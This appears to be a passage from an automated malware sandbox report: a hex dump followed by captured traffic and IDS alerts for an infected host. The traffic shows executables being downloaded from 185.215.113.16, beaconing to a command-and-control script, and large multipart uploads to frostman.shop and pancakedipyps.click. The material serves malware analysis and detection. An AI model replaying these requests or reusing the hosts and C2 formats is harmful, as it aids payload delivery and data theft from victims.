00 c2 bb 32 80 3c 01 fd 5e 49 64 10 99 90 d5 06 0a 03 fb ef ba 4d e5 90 a6 8b d8 fe 02 3b 07 4a d4 47 7d 99 35 3a 39 e6 5f da 44 21 8d a9 4a d9 ec fb 8f b6 1f 07 4e b5 94 e2 26 42 7a 07 80 0c f4 a7 ab 65 e5 71 02 0d a7 d3 bd 64 02 44 b0 5e 98 58 db ab 76 ad 59 c1 21 18 85 e2 b7 c7 fd df 99 14 d0 6b 8a 22 f4 76 5c 3f fc 01 78 1e f1 0c 3c 53 f6 3d 71 f6 40 0f d6 9d 94 0a 90 2c d7 98 2b f4 55 09 11 69 a4 c5 be 18 26 35 db 89 33 1c 0e ba 8b 07 16 84 52 97 70 c4 90 ca 01 55 3b 7f 05 32 f3 68 ba 5c 46 5b 85 2e a0 0d 9e fb 73 77 33 5d 4b 43 1d bb 79 58 ba 07 db 37 52 cd 08 c6 cf 75 da 37 a6 23 eb 13 a9 56 43 b4 3e 5d f9 73 bd bb 4c 65 69 71 70 37 1b 5d 5c 4b f1 09 64 03 c5 fa bd 99 9e eb 2b f4 3d b2 a5 58 50 49 23 c1 45 54 2c e8 e6 9c 95 9c 59 5a 73 fa 67 cc c8 8a 9a a7 35 d4 14 33 11 ab 60 12 06 03 73 48 3a 7f 99 5f 57 40 40 e6 5d ca 27 85 30 f2 4e 07 bf af 61 da 5c 1e 32 e2 ce d0 70 45 d3 42 90 9d 31 9f 80 51 99 d4 b9 2c ee 15 14 77 29 a4 eb b4 af 5a 82 e2 6c 82 fd 74 3a aa ca fb 0b c8 3c e2 29 06 23 a1 b2 2d f2 01 ed 49 3d af dc 7d 18 bf 34 c5 f5 a9 b5 24 4c 31 0f 77 e3 8e 0c 36 1d f3 1f 9f 8f 4d 2a 8e 55 80 b5 ed c2 c1 b8 8a e7 53 82 f3 89 af 4a 8d 2b 6a 5b 2d b8 1e d0 d4 bb c0 72 72 76 97 de b9 da e3 43 c0 d5 be d0 f1 14 76 ed e4 6b f4 40 8d 13 a5 13 10 3e 86 69 4a 96 e6 19 cb aa eb 3c 38 43 1e 0f
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 4d 63 72 53 4d 44 45 51 6c 69 73 57 33 63 46 71 31 37 33 34 37 34 30 31 30 32 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "McrSMDEQlisW3cFq1734740102", "data": "Done2" }
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018977001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018978001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018979001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018980001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49828 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49858 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49873 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49890 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49893 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49910 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49917 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49923 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49897 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49911 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49933 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49942 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49951 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49953 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49963 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49992 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49998 -> 172.67.180.113:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 172.67.180.113:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50015 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49975 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50021 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50046 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50105 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50144 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50157 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50151 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50156 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50161 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50163 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50164 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50167 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50168 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50165 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50169 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50170 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50178 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50180 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50181 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50182 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50205 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50217 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50220 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50223 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50225 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50216 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50235 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50266 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50274 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50278 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50281 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50279 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50286 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50288 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50291 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50294 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50229 -> 185.215.113.16:80
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WT0O6LZGJFCAJMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ASCZDP6QXSQAS6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15052Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IW4WT2NOZMOZU3E3ECTRUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AX1FVKTZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20506Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3O8GDBAS0ZU37YUAS0ZMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CR85IJPPJ3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1245Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7QQ1N79ZC2V37Q9ZCBIWUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5UAFWBEGY5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551772Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3O8GDBAS0ZU37YUAS0ZMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 7937Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----Q90R9HVAI58YU3ECJEKXUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 489Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treehoneyi.click
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----00HVS2NY5XBAAA1NG4OZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 505Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 213453Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 55081Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----PZMY5PHVAI5F3EKF37QQUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 142457Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----TJW47QQ1NYCJM7GVAIE3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 493Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2DB1DJMYMYM7YUS2VKXTUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 509Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 207993Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----M7YMOHLXBIEUAIMOP89RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 68733Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----QIEKNOZMOZU37QQQIWL6User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 262605Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVSUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 393697Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GVUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 131557Connection: Keep-AliveCache-Control: no-cache
